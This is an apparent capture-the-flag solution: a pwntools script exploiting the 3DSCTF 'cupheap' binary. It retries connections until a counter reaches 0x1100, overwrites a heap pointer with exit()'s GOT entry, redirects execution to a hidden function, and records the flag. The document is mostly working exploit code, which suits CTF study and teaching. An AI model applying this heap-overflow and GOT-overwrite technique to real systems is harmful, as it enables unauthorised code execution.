Tags: python pwn
Rating:
```
#!/usr/bin/python
from pwn import *
binary = "cupheap"
elf = ELF(binary)
chall, port = "cupheap01.3dsctf.org", 8007
context.log_level = "DEBUG"
DEBUG = False
def getpipe():
if DEBUG:
return process(binary)
else:
return remote(chall, port)
"""
In order to reach the vulnerable code in mauosoleum,
we have to get exactly 0x1100 in the variable contracts.
This variable is printed out in hex after every use of the
first menu option "Collect memory."
This has to be tried repeatedly until we get exactly 0x1100.
"""
p = None
def getContracts(proc):
while True:
proc.recvuntil("Give up\n")
proc.send("1\n")
proc.recvuntil("You have ")
contracts = int(proc.recv(6), 16)
if contracts == 0x1100:
return True
elif contracts > 0x1100:
return False
p = getpipe()
while getContracts(p) != True:
p.close()
p = getpipe()
"Drop into the second menu form immediately by giving some char not 1-3"
if "What's next?" not in p.recv():
p.send("\n\n")
p.recv()
"""
At this point, we should be granted access to the Mausoleum.
Now we take advantage of adjacent heap allocations.
"""
p.send("4\n") #Enter the Mausoleum
""" Overwrite pointer to malloc4 with exit()'s GOT entry."""
payload1 = flat([0xAAAAAAAAAAAAAAAA]*5, elf.got['exit'], word_size=64)
p.sendline(payload1)
#What's visitHell()?
visitHell = elf.symbols[u'_Z9visitHellv']
payload2 = flat(visitHell, word_size=64)
p.sendline(payload2)
print p.recv()
#3DS{y0u_ALL_fr33_0F_th3_H34Ps_d3BT}
```
